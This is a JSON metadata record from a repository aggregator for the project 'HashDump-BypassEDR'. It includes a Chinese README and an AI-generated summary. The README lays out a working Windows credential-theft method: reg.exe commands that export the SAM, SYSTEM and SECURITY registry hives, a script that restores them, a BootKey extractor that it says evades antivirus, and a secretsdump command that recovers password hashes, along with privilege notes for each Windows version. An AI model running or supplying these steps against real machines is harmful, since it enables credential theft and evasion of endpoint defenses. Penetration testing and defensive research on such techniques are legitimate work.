[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-75429":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":10,"language":11,"languages":10,"totalLinesOfCode":10,"stars":12,"forks":13,"watchers":14,"openIssues":14,"contributorsCount":15,"subscribersCount":15,"size":15,"stars1d":16,"stars7d":17,"stars30d":18,"stars90d":15,"forks30d":15,"starsTrendScore":19,"compositeScore":20,"rankGlobal":10,"rankLanguage":10,"license":21,"archived":22,"fork":22,"defaultBranch":23,"hasWiki":24,"hasPages":22,"topics":25,"createdAt":10,"pushedAt":10,"updatedAt":34,"readmeContent":35,"aiSummary":36,"trendingCount":15,"starSnapshotCount":15,"syncStatus":16,"lastSyncTime":37,"discoverSource":38},75429,"HashDump-BypassEDR","AabyssZG\u002FHashDump-BypassEDR","AabyssZG","Windows绕过EDR实现DumpHash","https:\u002F\u002Fblog.zgsec.cn\u002Farchives\u002FEDR-DumpHash.html",null,"PowerShell",242,31,1,0,2,4,60,6,56.52,"Apache License 2.0",false,"main",true,[26,27,28,29,30,31,32,33],"edr","edr-bypass","exploit","hashdump","intranet-penetration","security","security-tools","vulnerability","2026-06-12 04:01:18","![HashDump-BypassEDR](https:\u002F\u002Fsocialify.git.ci\u002FAabyssZG\u002FHashDump-BypassEDR\u002Fimage?description=1&font=JetBrains+Mono&forks=1&issues=1&language=1&name=1&owner=1&pattern=Diagonal+Stripes&pulls=1&stargazers=1&theme=Dark)\n\n# 1# 项目概述\n\n通过系统白程序 `Reg.exe` 的拓展应用，巧妙的绕过了杀软的拦截点，实现了绕过EDR从而DumpHash的目的。\n\n根据实际测试，该方法针对Windows系列系统具有有效性，操作难度不大，具有实战价值。\n\n本项目实战文章：\n- [如何绕过EDR实现DumpHash-AabyssZG'Blog](https:\u002F\u002Fblog.zgsec.cn\u002Farchives\u002FEDR-DumpHash.html)\n- [如何绕过EDR实现DumpHash-国家网络空间安全云社区](https:\u002F\u002Fnccsec.cn\u002Fcommunity\u002Fdetail?id=QaW2xdTj8gE)\n\n文章发表后，在国内和海外社区没找到相同的思路，原本以为是全球首发，后续根据粉丝评论，该思路之前海外有大佬分享过：[Dumping LSA secrets: a story about task decorrelation](https:\u002F\u002Fsensepost.com\u002Fblog\u002F2024\u002Fdumping-lsa-secrets-a-story-about-task-decorrelation\u002F)\n\n**本文的源代码和Release已发布在Github，分享不易，觉得不错的师傅可以给个Star，万分感谢！**\n\n# 2# 关键步骤\n\n## 2.1 第一步、导出reg文件\n\n在目标机器上执行命令导出 `.reg` 文件\n\n```c\nreg.exe export HKLM\\SAM C:\\Users\\Public\\sam.reg\nreg.exe export HKLM\\SYSTEM C:\\Users\\Public\\system.reg\nreg.exe export HKLM\\Security C:\\Users\\Public\\security.reg\n```\n\n## 2.2 第二步、在本机还原二进制\n\n将第一步的 `.reg` 文件下载到本机，在本机执行本项目的 `RegReduction.ps1` PowerShell脚本还原出二进制文件\n\n```c\n.\\RegReduction.ps1\n```\n\n![powershell.png](img\u002Fpowershell.png)\n\n## 2.3 第三步、拿到BootKey\n\n在目标机器上执行 `BootKey.exe` 可执行程序，源代码为本项目的 `BootKey.c` 文件\n\n```c\nBootKey.exe\n```\n\n![BootKey.png](img\u002FBootKey.png)\n\n免杀测试（2026.5.10）：[www.virustotal.com](https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002Fcb96f754c4b235fd68964bb0474951bf987da5ef33386fe3ab1a912df907eb91)\n\n![Virustotal.png](img\u002FVirustotal.png)\n\n## 2.4 第四步、通过secretsdump拿到Hash\n\n```c\npython secretsdump.py -sam SAM.hive -security SECURITY.hive -bootkey \u003C目标机器的BootKey> LOCAL\n```\n\n![HashOut.png](img\u002FHashOut.png)\n\n# 3# 权限说明\n\n本文有几个关键操作，在目标机器上的核心步骤就两个：\n\n- 使用 `reg.exe export` 命令导出关键注册表内容；\n- 使用 `BootKey.exe` 导出系统的BootKey。\n\n对于不同系统也进行了测试，结果如下：\n\n- 在实际测试中，在Win10和Win11以及Windows Server 2025环境上使用 `reg.exe export` 命令导出注册表需要SYSTEM权限，而在Windows Server 2022及以下环境使用 `reg.exe export` 命令导出注册表只需要普通管理员权限即可（并不需要SYSTEM权限），如果使用 `reg.exe export` 命令导出注册表后文件只有1KB大小，那就说明权限不够。\n- 在实际测试中，使用 `BootKey.exe` 提取程序导出BootKey是不需要管理员权限的，而且实测大部分杀软（目前遇到的杀软都不会）都不会查杀。\n\n# 🙏 4# 感谢各位师傅\n\n## Stargazers\n\n[![Stargazers repo roster for @AabyssZG\u002FHashDump-BypassEDR](http:\u002F\u002Freporoster.com\u002Fstars\u002FAabyssZG\u002FHashDump-BypassEDR)](https:\u002F\u002Fgithub.com\u002FAabyssZG\u002FHashDump-BypassEDR\u002Fstargazers)\n\n\n## Forkers\n\n[![Forkers repo roster for @AabyssZG\u002FHashDump-BypassEDR](http:\u002F\u002Freporoster.com\u002Fforks\u002FAabyssZG\u002FHashDump-BypassEDR)](https:\u002F\u002Fgithub.com\u002FAabyssZG\u002FHashDump-BypassEDR\u002Fnetwork\u002Fmembers)\n\n## Star History\n\n[![Star History Chart](https:\u002F\u002Fapi.star-history.com\u002Fsvg?repos=AabyssZG\u002FHashDump-BypassEDR&type=Date)](https:\u002F\u002Fstar-history.com\u002F#AabyssZG\u002FHashDump-BypassEDR&Date)\n","该项目通过利用系统自带的`Reg.exe`工具，实现绕过终端检测与响应（EDR）软件来DumpHash。其核心功能包括使用`Reg.exe`导出关键注册表文件、还原二进制文件以及获取BootKey，最终结合secretsdump工具提取哈希值。技术特点在于巧妙地规避了常见的安全软件拦截机制，主要依赖PowerShell脚本和C语言编写的辅助程序完成任务。适用于需要在受保护环境下进行内部渗透测试或安全评估的场景，特别是当常规方法受到限制时。","2026-06-11 03:52:44","CREATED_QUERY"]